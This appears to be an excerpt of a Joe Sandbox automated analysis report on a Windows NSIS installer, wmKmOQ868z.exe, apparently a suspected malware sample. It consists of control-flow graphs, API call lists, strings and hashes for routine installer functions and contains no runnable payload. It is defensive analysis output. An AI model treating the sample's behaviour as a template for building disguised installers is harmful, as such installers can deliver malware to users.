                                          control_flow_graph 258 403c26-403c3e call 406948 261 403c40-403c50 call 40649b 258->261 262 403c52-403c89 call 406422 258->262 269 403cac-403cd5 call 403efc call 405f2b 261->269 267 403ca1-403ca7 lstrcatW 262->267 268 403c8b-403c9c call 406422 262->268 267->269 268->267 276 403d67-403d6f call 405f2b 269->276 277 403cdb-403ce0 269->277 283 403d71-403d78 call 406591 276->283 284 403d7d-403da2 LoadImageW 276->284 277->276 278 403ce6-403d0e call 406422 277->278 278->276 285 403d10-403d14 278->285 283->284 287 403e23-403e2b call 40140b 284->287 288 403da4-403dd4 RegisterClassW 284->288 290 403d26-403d32 lstrlenW 285->290 291 403d16-403d23 call 405e50 285->291 299 403e35-403e40 call 403efc 287->299 300 403e2d-403e30 287->300 292 403ef2 288->292 293 403dda-403e1e SystemParametersInfoW CreateWindowExW 288->293 297 403d34-403d42 lstrcmpiW 290->297 298 403d5a-403d62 call 405e23 call 406554 290->298 291->290 296 403ef4-403efb 292->296 293->287 297->298 303 403d44-403d4e GetFileAttributesW 297->303 298->276 311 403e46-403e60 ShowWindow call 4068d8 299->311 312 403ec9-403ed1 call 4056ac 299->312 300->296 304 403d50-403d52 303->304 305 403d54-403d55 call 405e6f 303->305 304->298 304->305 305->298 319 403e62-403e67 call 4068d8 311->319 320 403e6c-403e7e GetClassInfoW 311->320 317 403ed3-403ed9 312->317 318 403eeb-403eed call 40140b 312->318 317->300 321 403edf-403ee6 call 40140b 317->321 318->292 319->320 324 403e80-403e90 GetClassInfoW RegisterClassW 320->324 325 403e96-403eb9 DialogBoxParamW call 40140b 320->325 321->300 324->325 329 403ebe-403ec7 call 403b76 325->329 329->296
                                          APIs
                                            • Part of subcall function 00406948: GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C), ref: 0040695A
                                            • Part of subcall function 00406948: GetProcAddress.KERNEL32(00000000,?), ref: 00406975
                                          • lstrcatW.KERNEL32(1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\wmKmOQ868z.exe"), ref: 00403CA7
                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\imaums\outadmiral\nedrunde,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,75923420), ref: 00403D27
                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\imaums\outadmiral\nedrunde,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D3A
                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403D45
                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\imaums\outadmiral\nedrunde), ref: 00403D8E
                                            • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                          • RegisterClassW.USER32(007A7200), ref: 00403DCB
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE3
                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E18
                                          • ShowWindow.USER32(00000005,00000000), ref: 00403E4E
                                          • GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E7A
                                          • GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E87
                                          • RegisterClassW.USER32(007A7200), ref: 00403E90
                                          • DialogBoxParamW.USER32(?,00000000,00403FD4,00000000), ref: 00403EAF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\user\Desktop\wmKmOQ868z.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\imaums\outadmiral\nedrunde$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                          • API String ID: 1975747703-2217069992
                                          • Opcode ID: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                          • Instruction ID: 87c0a3a17ad5e1939fcd37e1134105fdbaf016035d588be57f40016c0fe971d1
                                          • Opcode Fuzzy Hash: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                          • Instruction Fuzzy Hash: CA61D370100605AED720BF269D45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 332 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406044 335 4030f2-4030f7 332->335 336 4030fc-40312a call 406554 call 405e6f call 406554 GetFileSize 332->336 337 4032d2-4032d6 335->337 344 403130 336->344 345 403215-403223 call 40303e 336->345 346 403135-40314c 344->346 351 403225-403228 345->351 352 403278-40327d 345->352 349 403150-403159 call 4034d1 346->349 350 40314e 346->350 358 40327f-403287 call 40303e 349->358 359 40315f-403166 349->359 350->349 354 40322a-403242 call 4034e7 call 4034d1 351->354 355 40324c-403276 GlobalAlloc call 4034e7 call 4032d9 351->355 352->337 354->352 378 403244-40324a 354->378 355->352 383 403289-40329a 355->383 358->352 362 4031e2-4031e6 359->362 363 403168-40317c call 405fff 359->363 368 4031f0-4031f6 362->368 369 4031e8-4031ef call 40303e 362->369 363->368 381 40317e-403185 363->381 374 403205-40320d 368->374 375 4031f8-403202 call 406a35 368->375 369->368 374->346 382 403213 374->382 375->374 378->352 378->355 381->368 387 403187-40318e 381->387 382->345 384 4032a2-4032a7 383->384 385 40329c 383->385 388 4032a8-4032ae 384->388 385->384 387->368 389 403190-403197 387->389 388->388 390 4032b0-4032cb SetFilePointer call 405fff 388->390 389->368 391 403199-4031a0 389->391 395 4032d0 390->395 391->368 393 4031a2-4031c2 391->393 393->352 394 4031c8-4031cc 393->394 396 4031d4-4031dc 394->396 397 4031ce-4031d2 394->397 395->337 396->368 398 4031de-4031e0 396->398 397->382 397->396 398->368
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004030B3
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\wmKmOQ868z.exe,00000400), ref: 004030CF
                                            • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\wmKmOQ868z.exe,80000000,00000003), ref: 00406048
                                            • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                          • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\wmKmOQ868z.exe,C:\Users\user\Desktop\wmKmOQ868z.exe,80000000,00000003), ref: 0040311B
                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                          • String ID: "C:\Users\user\Desktop\wmKmOQ868z.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\wmKmOQ868z.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                          • API String ID: 2803837635-1231269094
                                          • Opcode ID: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                          • Instruction ID: 049f7c6d5ff3921a21710fe3aab5a9d19a74ce2d4ccd47fede02a431b1dffc51
                                          • Opcode Fuzzy Hash: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                          • Instruction Fuzzy Hash: A4519F71901204AFDF209FA5DD86BAE7EACAB45356F20817BF500B62D1CA7C9E408B5D

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 463 406591-40659a 464 40659c-4065ab 463->464 465 4065ad-4065c7 463->465 464->465 466 4067d7-4067dd 465->466 467 4065cd-4065d9 465->467 469 4067e3-4067f0 466->469 470 4065eb-4065f8 466->470 467->466 468 4065df-4065e6 467->468 468->466 472 4067f2-4067f7 call 406554 469->472 473 4067fc-4067ff 469->473 470->469 471 4065fe-406607 470->471 474 4067c4 471->474 475 40660d-406650 471->475 472->473 477 4067d2-4067d5 474->477 478 4067c6-4067d0 474->478 479 406656-406662 475->479 480 406768-40676c 475->480 477->466 478->466 481 406664 479->481 482 40666c-40666e 479->482 483 4067a0-4067a4 480->483 484 40676e-406775 480->484 481->482 489 406670-40668e call 406422 482->489 490 4066a8-4066ab 482->490 485 4067b4-4067c2 lstrlenW 483->485 486 4067a6-4067af call 406591 483->486 487 406785-406791 call 406554 484->487 488 406777-406783 call 40649b 484->488 485->466 486->485 497 406796-40679c 487->497 488->497 502 406693-406696 489->502 491 4066ad-4066b9 GetSystemDirectoryW 490->491 492 4066be-4066c1 490->492 498 40674b-40674e 491->498 499 4066d3-4066d7 492->499 500 4066c3-4066cf GetWindowsDirectoryW 492->500 497->485 503 40679e 497->503 504 406760-406766 call 406802 498->504 505 406750-406753 498->505 499->498 506 4066d9-4066f7 499->506 500->499 502->505 507 40669c-4066a3 call 406591 502->507 503->504 504->485 505->504 509 406755-40675b lstrcatW 505->509 511 4066f9-4066ff 506->511 512 40670b-406723 call 406948 506->512 507->498 509->504 516 406707-406709 511->516 520 406725-406738 SHGetPathFromIDListW CoTaskMemFree 512->520 521 40673a-406743 512->521 516->512 518 406745-406749 516->518 518->498 520->518 520->521 521->506 521->518
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066B3
                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0728,?,?), ref: 004066C9
                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406727
                                          • CoTaskMemFree.OLE32(00000000,?,?,00000007,00000000,007A0728,?,?), ref: 00406730
                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,007A0728,?,?), ref: 0040675B
                                          • lstrlenW.KERNEL32(Call,00000000,007A0728,?,?), ref: 004067B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 4024019347-1230650788
                                          • Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                          • Instruction ID: 996034b20cbe1ccfc182dbfd15fdcef075a6e82f48079f00531b92f4adf5a68d
                                          • Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                          • Instruction Fuzzy Hash: D56135716046119BD720AF24DD84B7B77E4AB85318F25063FF687B32D0DA3C8961865E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 522 4032d9-4032f0 523 4032f2 522->523 524 4032f9-403302 522->524 523->524 525 403304 524->525 526 40330b-403310 524->526 525->526 527 403320-40332d call 4034d1 526->527 528 403312-40331b call 4034e7 526->528 532 403333-403337 527->532 533 4034bf 527->533 528->527 534 40346a-40346c 532->534 535 40333d-403363 GetTickCount 532->535 536 4034c1-4034c2 533->536 540 4034ac-4034af 534->540 541 40346e-403471 534->541 537 4034c7 535->537 538 403369-403371 535->538 539 4034ca-4034ce 536->539 537->539 542 403373 538->542 543 403376-403384 call 4034d1 538->543 544 4034b1 540->544 545 4034b4-4034bd call 4034d1 540->545 541->537 546 403473 541->546 542->543 543->533 555 40338a-403393 543->555 544->545 545->533 556 4034c4 545->556 547 403476-40347c 546->547 550 403480-40348e call 4034d1 547->550 551 40347e 547->551 550->533 559 403490-40349c call 4060f6 550->559 551->550 558 403399-4033b9 call 406aa3 555->558 556->537 564 403462-403464 558->564 565 4033bf-4033d2 GetTickCount 558->565 566 403466-403468 559->566 567 40349e-4034a8 559->567 564->536 568 4033d4-4033dc 565->568 569 40341d-40341f 565->569 566->536 567->547 572 4034aa 567->572 573 4033e4-40341a MulDiv wsprintfW call 4055d9 568->573 574 4033de-4033e2 568->574 570 403421-403425 569->570 571 403456-40345a 569->571 575 403427-40342e call 4060f6 570->575 576 40343c-403447 570->576 571->538 577 403460 571->577 572->537 573->569 574->569 574->573 582 403433-403435 575->582 580 40344a-40344e 576->580 577->537 580->558 583 403454 580->583 582->566 584 403437-40343a 582->584 583->537 584->580
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: CountTick$wsprintf
                                          • String ID: ... %d%%$STy
                                          • API String ID: 551687249-2882605797
                                          • Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                          • Instruction ID: eb1ee041d621481d77111d3da967b5f6536357fdff7ba477760ccc35d22143eb
                                          • Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                          • Instruction Fuzzy Hash: FD515F71910219EBCF11CF65DA8469E7FA8AB00756F14417BE804BA2C1C7789B41CBAA

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 585 4068d8-4068f8 GetSystemDirectoryW 586 4068fa 585->586 587 4068fc-4068fe 585->587 586->587 588 406900-406909 587->588 589 40690f-406911 587->589 588->589 590 40690b-40690d 588->590 591 406912-406945 wsprintfW LoadLibraryExW 589->591 590->591
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                          • wsprintfW.USER32 ref: 0040692A
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040693E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                          • String ID: %s%S.dll$UXTHEME
                                          • API String ID: 2200240437-1106614640
                                          • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                          • Instruction ID: 3d91c3bba12f32b4d8e24f08bfb099957206232b6387f0edcfac50a9fed73821
                                          • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                          • Instruction Fuzzy Hash: 80F0F671501219ABDB20BB68DD0EF9B376CAB00304F10447AA546F10E0EB789B69CB98

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 592 6f701817-6f701856 call 6f701bff 596 6f701976-6f701978 592->596 597 6f70185c-6f701860 592->597 598 6f701862-6f701868 call 6f70243e 597->598 599 6f701869-6f701876 call 6f702480 597->599 598->599 604 6f7018a6-6f7018ad 599->604 605 6f701878-6f70187d 599->605 606 6f7018cd-6f7018d1 604->606 607 6f7018af-6f7018cb call 6f702655 call 6f701654 call 6f701312 GlobalFree 604->607 608 6f701898-6f70189b 605->608 609 6f70187f-6f701880 605->609 610 6f7018d3-6f70191c call 6f701666 call 6f702655 606->610 611 6f70191e-6f701924 call 6f702655 606->611 632 6f701925-6f701929 607->632 608->604 612 6f70189d-6f70189e call 6f702e23 608->612 614 6f701882-6f701883 609->614 615 6f701888-6f701889 call 6f702b98 609->615 610->632 611->632 625 6f7018a3 612->625 620 6f701890-6f701896 call 6f702810 614->620 621 6f701885-6f701886 614->621 628 6f70188e 615->628 631 6f7018a5 620->631 621->604 621->615 625->631 628->625 631->604 635 6f701966-6f70196d 632->635 636 6f70192b-6f701939 call 6f702618 632->636 635->596 638 6f70196f-6f701970 GlobalFree 635->638 642 6f701951-6f701958 636->642 643 6f70193b-6f70193e 636->643 638->596 642->635 644 6f70195a-6f701965 call 6f7015dd 642->644 643->642 645 6f701940-6f701948 643->645 644->635 645->642 647 6f70194a-6f70194b FreeLibrary 645->647 647->642
                                          APIs
                                            • Part of subcall function 6F701BFF: GlobalFree.KERNEL32(?), ref: 6F701E74
                                            • Part of subcall function 6F701BFF: GlobalFree.KERNEL32(?), ref: 6F701E79
                                            • Part of subcall function 6F701BFF: GlobalFree.KERNEL32(?), ref: 6F701E7E
                                          • GlobalFree.KERNEL32(00000000), ref: 6F7018C5
                                          • FreeLibrary.KERNEL32(?), ref: 6F70194B
                                          • GlobalFree.KERNEL32(00000000), ref: 6F701970
                                            • Part of subcall function 6F70243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6F70246F
                                            • Part of subcall function 6F702810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F701896,00000000), ref: 6F7028E0
                                            • Part of subcall function 6F701666: wsprintfW.USER32 ref: 6F701694
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2686110588.000000006F701000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F700000, based on PE: true
                                          • Associated: 00000000.00000002.2686088914.000000006F700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686134312.000000006F704000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686197105.000000006F706000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f700000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                          • String ID:
                                          • API String ID: 3962662361-3916222277
                                          • Opcode ID: a86a11117b4140d4f12f5dc35c50a4b71b11efc1d72abb3f87390ccef349c9c7
                                          • Instruction ID: 7cc3d8243d473f211dd206b4dbed3404c846712bc8376c8bcf375ae7ce8d1fbf
                                          • Opcode Fuzzy Hash: a86a11117b4140d4f12f5dc35c50a4b71b11efc1d72abb3f87390ccef349c9c7
                                          • Instruction Fuzzy Hash: B641AEF29003459ADB00BF74DA88BD937E8AF0632CF04457AF915AA0C6DBF4A194C7A0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 649 405f2b-405f46 call 406554 call 405ece 654 405f48-405f4a 649->654 655 405f4c-405f59 call 406802 649->655 656 405fa4-405fa6 654->656 659 405f69-405f6d 655->659 660 405f5b-405f61 655->660 662 405f83-405f8c lstrlenW 659->662 660->654 661 405f63-405f67 660->661 661->654 661->659 663 405f8e-405fa2 call 405e23 GetFileAttributesW 662->663 664 405f6f-405f76 call 4068b1 662->664 663->656 669 405f78-405f7b 664->669 670 405f7d-405f7e call 405e6f 664->670 669->654 669->670 670->662
                                          APIs
                                            • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                            • Part of subcall function 00405ECE: CharNextW.USER32(?,?,007A3F50,?,00405F42,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wmKmOQ868z.exe"), ref: 00405EDC
                                            • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
                                            • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9
                                          • lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wmKmOQ868z.exe"), ref: 00405F84
                                          • GetFileAttributesW.KERNELBASE(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
